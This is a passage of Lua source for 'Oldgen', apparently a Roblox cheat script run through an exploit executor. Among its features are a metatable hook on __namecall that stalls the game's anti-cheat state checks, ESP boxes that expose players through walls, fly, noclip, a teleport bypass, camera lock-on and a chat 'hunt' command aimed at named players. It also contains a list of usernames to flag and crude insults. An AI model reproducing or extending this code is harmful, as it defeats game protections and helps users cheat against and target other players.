		game.Players.LocalPlayer.Backpack.Knife.GripUp=Vector3.new(0,0,1)game.Players.LocalPlayer.Backpack.Knife.GripRight=Vector3.new(0,0,1)game.Players.LocalPlayer.Backpack.Knife.Punch1.AnimationId="rbxassetid://186934753"game.Players.LocalPlayer.Backpack.Knife.Punch2.AnimationId="rbxassetid://186934658"game.Players.LocalPlayer.Backpack.Knife.Running.AnimationId="rbxassetid://341273975"game.Players.LocalPlayer.Backpack.Knife.Info.AnimSpeed.Value="2.5"game.Players.LocalPlayer.Backpack.Knife.Info.Cooldown.Value="0.01"
		if game.Players.LocalPlayer.Character.Humanoid.Health <15 then
			wait(7.4)
			game.Players.LocalPlayer.Backpack.Knife.GripUp=Vector3.new(0,0,1)game.Players.LocalPlayer.Backpack.Knife.GripRight=Vector3.new(0,0,1)game.Players.LocalPlayer.Backpack.Knife.Punch1.AnimationId="rbxassetid://186934753"game.Players.LocalPlayer.Backpack.Knife.Punch2.AnimationId="rbxassetid://186934658"game.Players.LocalPlayer.Backpack.Knife.Running.AnimationId="rbxassetid://341273975"game.Players.LocalPlayer.Backpack.Knife.Info.AnimSpeed.Value="2.5"game.Players.LocalPlayer.Backpack.Knife.Info.Cooldown.Value="0.01"

		end
	end)

	machete.Name = "machete"
	machete.Parent = main
	machete.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
	machete.BorderSizePixel = 0
	machete.Position = UDim2.new(0.0633663312, 0, 0.556410313, 0)
	machete.Size = UDim2.new(0, 200, 0, 50)
	machete.Font = Enum.Font.Kalam
	machete.Text = "Machete Grip"
	machete.TextColor3 = Color3.fromRGB(0, 0, 0)
	machete.TextSize = 50.000
	machete.MouseButton1Click:connect(function()
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Machete Grip Enabled! Equip Machete.";
		})	
		game.Players.LocalPlayer.Backpack.Machete.Info.Cooldown.Value=0.58;game.Players.LocalPlayer.Backpack.Machete.Info.AnimSpeed.Value=1.75;wait(0.1)game.Players.LocalPlayer.Backpack.Machete.Idle.AnimationId="rbxassetid://503259904"game.Players.LocalPlayer.Backpack.Machete.Punch2.AnimationId="rbxassetid://455658585"game.Players.LocalPlayer.Backpack.Machete.Running.AnimationId="rbxassetid://431972483"
		if game.Players.LocalPlayer.Character.Humanoid.Health == 0 then
			wait(8)	game.Players.LocalPlayer.Backpack.Machete.Info.Cooldown.Value=0.58;game.Players.LocalPlayer.Backpack.Machete.Info.AnimSpeed.Value=1.75;wait(0.1)game.Players.LocalPlayer.Backpack.Machete.Idle.AnimationId="rbxassetid://503259904"game.Players.LocalPlayer.Backpack.Machete.Punch2.AnimationId="rbxassetid://455658585"game.Players.LocalPlayer.Backpack.Machete.Running.AnimationId="rbxassetid://431972483"

		end
	end)

	pipe.Name = "pipe"
	pipe.Parent = main
	pipe.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
	pipe.BorderSizePixel = 0
	pipe.Position = UDim2.new(0.0653465316, 0, 0.71282053, 0)
	pipe.Size = UDim2.new(0, 200, 0, 50)
	pipe.Font = Enum.Font.Kalam
	pipe.Text = "Upside Down Pipe"
	pipe.TextColor3 = Color3.fromRGB(0, 0, 0)
	pipe.TextScaled = true
	pipe.TextSize = 54.000
	pipe.TextWrapped = true
	pipe.MouseButton1Click:connect(function()
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Upside Down Pipe Enabled! Equip Pipe.";
		})	
		game.Players.LocalPlayer.Backpack.Pipe.GripUp = Vector3.new(100,6,5)game.Players.LocalPlayer.Backpack.Pipe.GripUp = Vector3.new(100,6,5)game.Players.LocalPlayer.Backpack.Knife.Punch1.AnimationId="rbxassetid://186934753"game.Players.LocalPlayer.Backpack.Pipe.Punch2.AnimationId="rbxassetid://186934658"game.Players.LocalPlayer.Backpack.Pipe.Running.AnimationId="rbxassetid://341273975"
		if game.Players.LocalPlayer.Character.Humanoid.Health == 0 then
			wait(8)	game.Players.LocalPlayer.Backpack.Pipe.GripUp = Vector3.new(100,6,5)game.Players.LocalPlayer.Backpack.Pipe.GripUp = Vector3.new(100,6,5)game.Players.LocalPlayer.Backpack.Knife.Punch1.AnimationId="rbxassetid://186934753"game.Players.LocalPlayer.Backpack.Pipe.Punch2.AnimationId="rbxassetid://186934658"game.Players.LocalPlayer.Backpack.Pipe.Running.AnimationId="rbxassetid://341273975"

		end
	end)

	TextLabel_4.Parent = main
	TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_4.BackgroundTransparency = 1.000
	TextLabel_4.Position = UDim2.new(0.485148519, 0, 0.223076925, 0)
	TextLabel_4.Size = UDim2.new(0, 256, 0, 50)
	TextLabel_4.Font = Enum.Font.Kalam
	TextLabel_4.Text = "Fun Stuff"
	TextLabel_4.TextColor3 = Color3.fromRGB(0, 0, 0)
	TextLabel_4.TextSize = 35.000

	extend.Name = "extend"
	extend.Parent = main
	extend.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
	extend.BorderSizePixel = 0
	extend.Position = UDim2.new(0.540594041, 0, 0.405128211, 0)
	extend.Size = UDim2.new(0, 200, 0, 50)
	extend.Font = Enum.Font.Kalam
	extend.Text = "Extend Shotgun/Glock"
	extend.TextColor3 = Color3.fromRGB(0, 0, 0)
	extend.TextScaled = true
	extend.TextSize = 54.000
	extend.TextWrapped = true
	extend.MouseButton1Click:connect(function()
		local Player = game.Players.LocalPlayer
		local mouse = Player:GetMouse()
		local Players game:GetService("Players")
		mouse.KeyDown:connect(function(key)
			if key == "f" then
				Player.Character.Humanoid:UnequipTools()
				game.Players.LocalPlayer.Backpack.Shotty.GripPos     = Vector3.new(0, -0.4, 10)

				Player.Backpack.Shotty.Parent = Player.Character

			end
		end)
		mouse.KeyDown:connect(function(key) 
			if key == "g" then
				Player.Character.Humanoid:UnequipTools()
				game.Players.LocalPlayer.Backpack.Shotty.GripPos     = Vector3.new(0, 0, 0.1)
				Player.Backpack.Shotty.Parent = Player.Character
			end
		end)

		mouse.KeyDown:connect(function(key)
			if key == "x" then
				Player.Character.Humanoid:UnequipTools()
				game.Players.LocalPlayer.Backpack.Glock.GripPos     = Vector3.new(7, 0, 0)
				Player.Backpack.Glock.Parent = Player.Character

			end
		end)
		mouse.KeyDown:connect(function(key) 
			if key == "c" then
				Player.Character.Humanoid:UnequipTools()
				game.Players.LocalPlayer.Backpack.Glock.GripPos     = Vector3.new(0, 0, 0.1)
				Player.Backpack.Glock.Parent = Player.Character
			end
		end)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Extended Shotty/Glock Enabled! F To Extend Shotty, G To Shrink, X To Extend Glock, C To Shrink.";
		})
	end)

	keybinds.Name = "keybinds"
	keybinds.Parent = main
	keybinds.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
	keybinds.BorderSizePixel = 0
	keybinds.Position = UDim2.new(0.540594041, 0, 0.556410253, 0)
	keybinds.Size = UDim2.new(0, 200, 0, 50)
	keybinds.Font = Enum.Font.Kalam
	keybinds.Text = "Gun/Reset Keybinds"
	keybinds.TextColor3 = Color3.fromRGB(0, 0, 0)
	keybinds.TextScaled = true
	keybinds.TextSize = 54.000
	keybinds.TextWrapped = true
	keybinds.MouseButton1Click:connect(function()
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Keybinds Enabled! Glock is Q, Shotty is E, And Reset is R.";
		})
		local Player = game.Players.LocalPlayer
		local mouse = Player:GetMouse()
		local loop = true
		local died = false

		mouse.KeyDown:connect(function(key)
			if key == "q" then
				Player.Character.Humanoid:UnequipTools()

				Player.Backpack.Glock.Parent = Player.Character

			end
		end)

		mouse.KeyDown:connect(function(key)
			if key == "e" then
				Player.Character.Humanoid:UnequipTools()

				Player.Backpack.Shotty.Parent = Player.Character

			end
		end)

		mouse.KeyDown:connect(function(key)
			if key == "r" then
				
				game.Players.LocalPlayer.Character.Humanoid.Health = 0
				if tpbypass == false then
					
				mn = game.Players.LocalPlayer.Character:WaitForChild('HumanoidRootPart').CFrame
				game.Players.LocalPlayer.Character.Parent = workspace.Terrain

				game:GetService('Workspace'):WaitForChild(game.Players.LocalPlayer.Name)
				for i = 1, 10 do
					game.Players.LocalPlayer.Character:WaitForChild('HumanoidRootPart').CFrame = mn
					wait()
					end
				else
					mn = game.Players.LocalPlayer.Character:WaitForChild('Torso').CFrame
					game.Players.LocalPlayer.Character.Parent = workspace.Terrain

					game:GetService('Workspace'):WaitForChild(game.Players.LocalPlayer.Name)
					for i = 1, 10 do
						game.Players.LocalPlayer.Character:WaitForChild('Torso').CFrame = mn
						wait()	
					end
				end
			end
		end)

		repeat wait()
			pcall(function()
			if game.Players.LocalPlayer.Character.Humanoid.Health <12 then
				local died = true
				if died == true then
				if tpbypass == false then
					game.Players.LocalPlayer.Character.Humanoid.Health = 0
					mn = game.Players.LocalPlayer.Character:WaitForChild('HumanoidRootPart').CFrame
					game.Players.LocalPlayer.Character.Parent = workspace.Terrain

					game:GetService('Workspace'):WaitForChild(game.Players.LocalPlayer.Name)
					for i = 1, 10 do
						game.Players.LocalPlayer.Character:WaitForChild('HumanoidRootPart').CFrame = mn
						wait()

						died = false
					end
				end
			end
		else
				if game.Players.LocalPlayer.Character.Humanoid.Health <12 then
					local died = true
					if died == true then
							game.Players.LocalPlayer.Character.Humanoid.Health = 0
							mn = game.Players.LocalPlayer.Character:WaitForChild('Torso').CFrame
							game.Players.LocalPlayer.Character.Parent = workspace.Terrain

							game:GetService('Workspace'):WaitForChild(game.Players.LocalPlayer.Name)
							for i = 1, 10 do
								game.Players.LocalPlayer.Character:WaitForChild('Torso').CFrame = mn
								wait()

							died = false
						end
					end
				end
				end
			end)
		until loop == false
	end)

	shottypp.Name = "shottypp"
	shottypp.Parent = main
	shottypp.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
	shottypp.BorderSizePixel = 0
	shottypp.Position = UDim2.new(0.540594041, 0, 0.71282053, 0)
	shottypp.Size = UDim2.new(0, 200, 0, 50)
	shottypp.Font = Enum.Font.Kalam
	shottypp.Text = "Shotgun Dick"
	shottypp.TextColor3 = Color3.fromRGB(0, 0, 0)
	shottypp.TextScaled = true
	shottypp.TextSize = 54.000
	shottypp.TextWrapped = true
	shottypp.MouseButton1Click:connect(function()
		-- shotgun pp
		game.Players.LocalPlayer.Backpack.Shotty.GripPos =  Vector3.new(1, 2, -1)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Shotty Dick Enabled You Fucking Virgin! Equip Shotty.";
		})
	end)

	openframe.Name = "openframe"
	openframe.Parent = gripgui
	openframe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	openframe.Position = UDim2.new(0.00631911308, 0, 0.141252026, 0)
	openframe.Size = UDim2.new(0, 72, 0, 0)
	openframe.Visible = false

	open.Name = "open"
	open.Parent = openframe
	open.BackgroundColor3 = Color3.fromRGB(138, 138, 138)
	open.BorderSizePixel = 0
	open.Position = UDim2.new(-0.138888896, 0, 0, 0)
	open.Size = UDim2.new(0, 75, 0, 50)
	open.Font = Enum.Font.Kalam
	open.Text = "Open"
	open.TextColor3 = Color3.fromRGB(0, 0, 0)
	open.TextSize = 40.000
	open.MouseButton1Click:connect(function()
		main.Visible = true
		openframe.Visible = false
	end)
end

-- i did not make this fly credits to vx_f for maiking this fly, was supposed to be for rogue lineage but that didnt work out very well so its here now aaaaaaaaaaaa --

local l = game.Players.LocalPlayer
local m = l:GetMouse()
local uis = game.UserInputService
local rs = game.RunService
local states = {Enum.HumanoidStateType.FallingDown,Enum.HumanoidStateType.Running,Enum.HumanoidStateType.RunningNoPhysics,Enum.HumanoidStateType.Climbing,Enum.HumanoidStateType.StrafingNoPhysics,Enum.HumanoidStateType.Ragdoll,Enum.HumanoidStateType.Jumping,Enum.HumanoidStateType.Landed,Enum.HumanoidStateType.Flying,Enum.HumanoidStateType.Freefall,Enum.HumanoidStateType.Seated,Enum.HumanoidStateType.PlatformStanding,Enum.HumanoidStateType.Dead,Enum.HumanoidStateType.Physics}
local meta = getrawmetatable(game)
local namecall = meta.__namecall
make_writeable(meta)
meta.__namecall = newcclosure(function(self,...)
	if not checkcaller() then
		local args = {...}
		if getnamecallmethod() == 'GetStateEnabled' then
			return wait(9e9)
		end
	end
	return namecall(self,...)
end)
flysettings = {
	keybind = Enum.KeyCode.F,
	fly = false,
	speed = 400,
	directions = {w = false, s = false, a = false, d = false}
}

function TweenToPos(pos, speed)
	local a = game.TweenService
	local b =  l.Character.Torso or l.Character.HumanoidRootPart
	local c = TweenInfo.new(1 * math.floor((b.Position - pos).magnitude) / speed, Enum.EasingStyle.Linear, Enum.EasingDirection.In, 0, false, 0)  
	a:Create(b, c, {CFrame = CFrame.new(pos)}):Play()
	repeat
		b.Velocity = Vector3.new(0, 0, 0)
	until 1 * math.floor((b.Position - pos).magnitude) / speed
end
function ChangeStates(b)
	pcall(function() -- me when pcall yes
		for i, v in pairs(states) do
			l.Character.Humanoid:SetStateEnabled(v, b)

		end
	end)
end
uis.InputBegan:connect(function(input,chat)
	if chat then
		return
	end
	if input.KeyCode == flysettings.keybind then
		flysettings.fly = not flysettings.fly
	elseif input.KeyCode == Enum.KeyCode.W then
		flysettings.directions.w = true
	elseif input.KeyCode == Enum.KeyCode.S then
		flysettings.directions.s = true
	elseif input.KeyCode == Enum.KeyCode.A then
		flysettings.directions.a = true
	elseif input.KeyCode == Enum.KeyCode.D then
		flysettings.directions.d = true
	end
end)
uis.InputEnded:connect(function(input,chat)
	if chat then
		return
	end
	if input.KeyCode == Enum.KeyCode.W then
		flysettings.directions.w = false
	elseif input.KeyCode == Enum.KeyCode.S then
		flysettings.directions.s = false
	elseif input.KeyCode == Enum.KeyCode.A then
		flysettings.directions.a = false
	elseif input.KeyCode == Enum.KeyCode.D then
		flysettings.directions.d = false
	end
end)
rs.RenderStepped:connect(function()



	if flysettings.fly == true then
		if tpbypass == false then
		else

			ChangeStates(false)
			l.Character.Torso.Velocity = Vector3.new(0, 0, 0)
			if flysettings.directions.w == true then
				TweenToPos(l.Character.Torso.CFrame.p + workspace.CurrentCamera.CoordinateFrame.lookVector * 2.5, flysettings.speed)
			end
			if flysettings.directions.s == true then
				TweenToPos(l.Character.Torso.CFrame.p - workspace.CurrentCamera.CoordinateFrame.lookVector * 2.5, flysettings.speed)
			end
			if flysettings.directions.a == true then
				TweenToPos(l.Character.Torso.CFrame.p - workspace.CurrentCamera.CoordinateFrame.rightVector * 2.5, flysettings.speed)
			end
			if flysettings.directions.d == true then
				TweenToPos(l.Character.Torso.CFrame.p + workspace.CurrentCamera.CoordinateFrame.rightVector * 2.5, flysettings.speed)
			end
		end
	else
		ChangeStates(true)
	end
end)



-- random serverhop thing, credits to chupachups for sending it yes --
function GetServers()
	local a = {}
	local b = game:HttpGet('https://games.roblox.com/v1/games/'..tostring(game.PlaceId)..'/servers/Public?limit=100&sortOrder=Asc')
	local c = game.HttpService:JSONDecode(b)
	for i, v in pairs(c.data) do
		if c.data.playing ~= 8 then
			table.insert(a, v.id)
		end
	end
	return a
end
function HopServer()
	local a = GetServers()
	local b
	repeat b = a[math.random(1, #a)] until b ~= game.JobId
	game.TeleportService:TeleportToPlaceInstance(game.PlaceId, b)
end

-- Scripts:

local function GBVO_fake_script() -- TextLabel.LocalScript 
	local script = Instance.new('LocalScript', TextLabel)

	function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end

	counter = 0

	while wait(0.1)do
		script.Parent.TextColor3 = Color3.fromHSV(zigzag(counter),1,1)

		counter = counter + 0.01
	end
end
coroutine.wrap(GBVO_fake_script)()

function GetPlayer(String)
	local Found = {}
	local strl = String:lower()
	if strl == "all" then
		for i, v in pairs(game.Players:GetPlayers()) do
			table.insert(Found, v)
		end
	elseif strl == "others" then
		for i, v in pairs(game.Players:GetPlayers()) do
			if v.Name ~= game.Players.LocalPlayer.Name then
				table.insert(Found, v)
			end
		end
	else
		for i, v in pairs(game.Players:GetPlayers()) do
			if v.Name:lower():sub(1, #String) == String:lower() then
				table.insert(Found, v)
			end
		end
	end
	return Found
end

-- finally updated garbage esp cusi  was lazy enough


local camera = game:GetService("Workspace").CurrentCamera
local CurrentCamera =workspace.CurrentCamera
local pp = game.Players.LocalPlayer
local worldToViewportPoint = CurrentCamera.worldToViewportPoint
local bhead = Vector3.new(0,0.5,0)
local bleg = Vector3.new(0,3,0)


for _,v in pairs(game.Players:GetChildren()) do
	local BoxOutline = Drawing.new("Square")
	BoxOutline.Visible = false

	BoxOutline.Color = Color3.new(0,0,0)


	BoxOutline.Thickness = 3
	BoxOutline.Transparency = 1
	BoxOutline.Filled = false

	local mbox = Drawing.new("Square")
	mbox.Visible = false



	mbox.Color = Color3.fromRGB(107,50,124)


	mbox.Thickness = 1
	mbox.Transparency = 1
	mbox.Filled = false

	local names = Drawing.new("Text")
	names.Text = v.Name
	names.Color = Color3.fromRGB(123,0,123)
	names.Font = 3
	names.Visible = false

	function esp()
		game:GetService("RunService").RenderStepped:connect(function()
			if v.Character ~= nil and v.Character:FindFirstChild("Humanoid") ~= nil and v.Character:FindFirstChild("HumanoidRootPart") ~= nil and v ~= pp and v.Character.Humanoid.Health > 0 then
				local Vector, onScreen = camera:worldToViewportPoint(v.Character.HumanoidRootPart.Position)
				local rootpart = v.Character.HumanoidRootPart
				local Head = v.Character.Head
				local rootpos, rootvis = worldToViewportPoint(CurrentCamera,rootpart.Position)
				local headpos = worldToViewportPoint(CurrentCamera, Head.Position + bhead)
				local legpos = worldToViewportPoint(CurrentCamera, rootpart.Position - bleg)
				if onScreen then
					BoxOutline.Size = Vector2.new(1000 / rootpos.Z, headpos.Y - legpos.Y)
					BoxOutline.Position = Vector2.new(rootpos.X - BoxOutline.Size.X /2, rootpos.Y - BoxOutline.Size.Y / 2)
					BoxOutline.Visible = true

					mbox.Size = Vector2.new(1000 / rootpos.Z, headpos.Y - legpos.Y)
					mbox.Position = Vector2.new(rootpos.X - mbox.Size.X /2, rootpos.Y - mbox.Size.Y / 2)
					mbox.Visible = true


					names.Position = Vector2.new(headpos.X,headpos.Y)
					names.Visible = true   

				else
					BoxOutline.Visible = false
					mbox.Visible = false
					names.Visible = false

				end
			else
				BoxOutline.Visible = false
				mbox.Visible = false
				names.Visible = false

			end
		end)
	end
	coroutine.wrap(esp)()
end

game.Players.PlayerAdded:connect(function(v)
	local BoxOutline = Drawing.new("Square")
	BoxOutline.Visible = false

	BoxOutline.Color = Color3.new(0,0,0)


	BoxOutline.Thickness = 3
	BoxOutline.Transparency = 1
	BoxOutline.Filled = false

	local mbox = Drawing.new("Square")
	mbox.Visible = false



	mbox.Color = Color3.fromRGB(107,50,124)


	mbox.Thickness = 1
	mbox.Transparency = 1
	mbox.Filled = false

	local names = Drawing.new("Text")
	names.Text = v.Name
	names.Color = Color3.fromRGB(123,0,123)
	names.Font = 3
	names.Visible = false

	function esp()
		game:GetService("RunService").RenderStepped:connect(function()
			if v.Character ~= nil and v.Character:FindFirstChild("Humanoid") ~= nil and v.Character:FindFirstChild("HumanoidRootPart") ~= nil and v ~= pp and v.Character.Humanoid.Health > 0 then
				local Vector, onScreen = camera:worldToViewportPoint(v.Character.HumanoidRootPart.Position)
				local rootpart = v.Character.HumanoidRootPart
				local Head = v.Character.Head
				local rootpos, rootvis = worldToViewportPoint(CurrentCamera,rootpart.Position)
				local headpos = worldToViewportPoint(CurrentCamera, Head.Position + bhead)
				local legpos = worldToViewportPoint(CurrentCamera, rootpart.Position - bleg)
				if onScreen then
					BoxOutline.Size = Vector2.new(1000 / rootpos.Z, headpos.Y - legpos.Y)
					BoxOutline.Position = Vector2.new(rootpos.X - BoxOutline.Size.X /2, rootpos.Y - BoxOutline.Size.Y / 2)
					BoxOutline.Visible = true

					mbox.Size = Vector2.new(1000 / rootpos.Z, headpos.Y - legpos.Y)
					mbox.Position = Vector2.new(rootpos.X - mbox.Size.X /2, rootpos.Y - mbox.Size.Y / 2)
					mbox.Visible = true


					names.Position = Vector2.new(headpos.X,headpos.Y)
					names.Visible = true 

				else
					BoxOutline.Visible = false
					mbox.Visible = false
					names.Visible = false

				end
			else
				BoxOutline.Visible = false
				mbox.Visible = false
				names.Visible = false

			end
		end)
	end
	coroutine.wrap(esp)()
end)

-- end garbage esp

-- i like this
skids = {"Z3OW","CRYOVERlT","ilyvamp","koadachi","sayukje","LuxuryZeoww","LuxuryJaack","LuxuryChaarlie","LATETERMINATION","LuxuryC43S","LuxuryC43"}
developers = {"Scartesu","AkaiHansha"}

game.Players.PlayerAdded:connect(function(skid)
	if table.find(skids,skid.Name) then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Someone On The SkidList Has Joined Your Server, User: "..skid.Name.."";
		})
	end
end)


game.Players.PlayerAdded:connect(function(players)
	if table.find(developers,players.Name) then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Oldgen Developer "..players.Name.." Has Joined The Server";
		})
	else
	end
end)

game.Players.PlayerAdded:connect(function(players)
	if table.find(skids,players.Name) then
	else
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = ""..players.Name.." Has Joined The Server";
		})
	end
end)

game.Players.PlayerRemoving:connect(function(players)
	
	game:GetService("StarterGui"):SetCore("SendNotification", {
		Title = "Oldgen";
		Text = ""..players.Name.." Has Left The Server";
		})
end)


Credits.Name = "Credits"
Credits.Parent = oldgenui
Credits.BackgroundColor3 = Color3.fromRGB(57, 57, 57)
Credits.BorderSizePixel = 0
Credits.Position = UDim2.new(0.334545463, 0, 0.200245693, 0)
Credits.Size = UDim2.new(0, 547, 0, 402)
Credits.Visible = true


TextLabela.Parent = Credits
TextLabela.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabela.BackgroundTransparency = 1.000
TextLabela.Position = UDim2.new(0.32541132, 0, 0.460198998, 0)
TextLabela.Size = UDim2.new(0, 200, 0, 50)
TextLabela.Font = Enum.Font.Ubuntu
TextLabela.Text = "OldGen Developed By Scar ye v2#7410 (Scartesu)"
TextLabela.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabela.TextSize = 30.000
TextLabela.TextScaled = true

TextLabelb.Parent = Credits
TextLabelb.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabelb.BackgroundTransparency = 1.000
TextLabelb.BorderSizePixel = 0
TextLabelb.Position = UDim2.new(0.138939664, 0, 0.569651723, 0)
TextLabelb.Size = UDim2.new(0, 410, 0, 50)
TextLabelb.Font = Enum.Font.Ubuntu
TextLabelb.Text = "Shout Outs To: vX_F, ChupaChups, And Any Funny People Using This Garbage Script"
TextLabelb.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabelb.TextScaled = true
TextLabelb.TextSize = 30.000
TextLabelb.TextWrapped = true

close.Name = "close"
close.Parent = Credits
close.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
close.BackgroundTransparency = 1.000
close.BorderSizePixel = 0
close.Position = UDim2.new(0.956124306, 0, 0.0149253728, 0)
close.Size = UDim2.new(0, 24, 0, 17)
close.Font = Enum.Font.LuckiestGuy
close.Text = "X"
close.TextColor3 = Color3.fromRGB(0, 0, 0)
close.TextSize = 20.000
close.MouseButton1Click:connect(function()
	Credits.Visible = false
end)
ImageLabel.Parent = Credits
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0.294332713, 0, 0.0721393004, 0)
ImageLabel.Size = UDim2.new(0, 234, 0, 125)
ImageLabel.Image = "rbxassetid://6900246128"

TextLabel_key.Parent = Credits
TextLabel_key.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_key.BackgroundTransparency = 1.000
TextLabel_key.BorderSizePixel = 0
TextLabel_key.Position = UDim2.new(0.127970755, 0, 0.733830869, 0)
TextLabel_key.Size = UDim2.new(0, 410, 0, 50)
TextLabel_key.Font = Enum.Font.Ubuntu
TextLabel_key.Text = "Keybinds: R To Reset When Enabled, F To Fly (tpbypass must be enabled), Q To Equip Glock And E To Equip Shotty If Enabled (Enable In GripGui), Press ; to open cmd bar, Shift To Blink"
TextLabel_key.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_key.TextScaled = true
TextLabel_key.TextSize = 30.000
TextLabel_key.TextWrapped = true

local chatFrame = game:GetService("Players").LocalPlayer.PlayerGui.Chat.Frame
chatFrame.ChatChannelParentFrame.Visible=true
chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y)



game.Players.LocalPlayer.Chatted:connect(function(msg)
	if string.sub(msg, 1, 6) == (prefix.."hunt ") then

		for i,v in pairs(GetPlayer(string.sub(msg, 7)))do	
			if tpbypass == false then
				tpbypass = true
				game:GetService("StarterGui"):SetCore("SendNotification", {
					Title = "Oldgen";
					Text = "Enabled Tpbypass To Teleport";
				})
			end
			hunted = v
			Target = v
			shoottoggle = true
			hunt = true
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Hunting "..hunted.Name.."";
			})
		end
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."unhunt" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Hunting";
		})
		hunt = false
		shoottoggle = false
		Target = nil
		hunted = nil
	end
end)

local spinmeme = Instance.new("Animation")
spinmeme.AnimationId = "rbxassetid://188632011"

coroutine.resume(coroutine.create(function()
	while wait() do
		pcall(function()
	if spinning == true then
		wait(0.1)
		game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(spinmeme):Play(.1,1,2)
	else
		game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(spinmeme):Stop()
		    end
		end)
	 end
end))



coroutine.wrap(function()
		if antigh == true then
				game.Players.LocalPlayer.Character.Humanoid.StateChanged:connect(function(mm)
				if mm == Enum.HumanoidStateType.FallingDown or Enum.HumanoidStateType.FallingDown then
					game.Players.LocalPlayer.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Running and Enum.HumanoidStateType.GettingUp)
					game.Players.LocalPlayer.Character.Humanoid.PlatformStand = false
				else
				game.Players.LocalPlayer.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Running and Enum.HumanoidStateType.RunningNoPhysics)
				   end
			   end)
	    else
	  end
end)

-- runservice --
game:GetService('RunService').Stepped:connect(function()
	if god == true then
		game.Players.LocalPlayer.Character["Right Leg"]:Destroy()
	end
	if noclip == true then
		pcall(function()
		game.Players.LocalPlayer.Character["Left Leg"].CanCollide = false
		game.Players.LocalPlayer.Character["Right Leg"].CanCollide = false
		game.Players.LocalPlayer.Character["Left Arm"].CanCollide = false
		game.Players.LocalPlayer.Character["Right Arm"].CanCollide = false
		game.Players.LocalPlayer.Character.Torso.CanCollide = false
		game.Players.LocalPlayer.Character.Head.CanCollide = false
		end)
		end
	pcall(function()
		game.Players.LocalPlayer.Character.Glock.Barrel.CanCollide = false
	end)
	if invis == true  then

	else
		if tpbypass == true then

			pcall(function()
				local client = game:GetService("Players").LocalPlayer;
				local lighting = game:GetService("Lighting");

				client.Character:FindFirstChild("HumanoidRootPart"):Destroy();
				client.Character:FindFirstChildWhichIsA("Humanoid").Parent = lighting;
				lighting:FindFirstChildWhichIsA("Humanoid").Parent = client.Character;

			end)
		end
	end

	if camsettings.locking == true then
		pcall(function() -- i love pcall
			if game.Players[camsettings.locktarget.Name] ~= nil then

				game.Workspace.Camera.CFrame = CFrame.new(game.Workspace.Camera.CFrame.p, game.Players[camsettings.locktarget.Name].Character:FindFirstChild("Torso").CFrame.p)

			end
		end)
	else
	end
	pcall(function() -- heskjjksdaadkjdsjkasdjksa
		if game.Players.LocalPlayer.Character.Humanoid.Health == 0 then
			if invis == true then
				invis = false
			else

			end
		end
	end)
end)

-- start of commands --

local health = Instance.new("ScreenGui");local Frame = Instance.new("Frame");local TextLabel = Instance.new("TextLabel")
health.Name = "health";health.Parent = game.CoreGui
Frame.Parent = health;Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255);Frame.BackgroundTransparency = 1.000;Frame.Position = UDim2.new(0.353333324, 0, 0.734969318, 0);Frame.Size = UDim2.new(0, 564, 0, 36)
TextLabel.Parent = Frame;TextLabel.BackgroundColor3 = Color3.fromRGB(5, 5, 5);TextLabel.BackgroundTransparency = 1.000;TextLabel.Position = UDim2.new(-0.0496453904, 0, -0.055555556, 0);TextLabel.Size = UDim2.new(0, 538, 0, 35);TextLabel.Font = Enum.Font.Ubuntu;TextLabel.TextColor3 = Color3.fromRGB(100, 5, 100);TextLabel.TextSize = 45.000

local l = game.Players.LocalPlayer

if l.Character and l.Character:FindFirstChild("Humanoid") then
	local hum = l.Character.Humanoid
	TextLabel.Text = string.format("Health: %d", hum.Health)
	local con = hum:GetPropertyChangedSignal("Health"):Connect(function()
		TextLabel.Text = string.format("Health: %d", hum.Health)
	end)
end

l.CharacterAdded:Connect(function(c)
	repeat wait() until c:FindFirstChild("Humanoid")
	local hum = c.Humanoid
	TextLabel.Text = string.format("Health: %d", hum.Health)
	local con = hum:GetPropertyChangedSignal("Health"):Connect(function()
		TextLabel.Text = string.format("Health: %d", hum.Health)
	end)
end)




-- display ammo now ye

local ammo = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")

ammo.Name = "ammo"
ammo.Parent = game.CoreGui

Frame.Parent = ammo
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BackgroundTransparency = 1.000
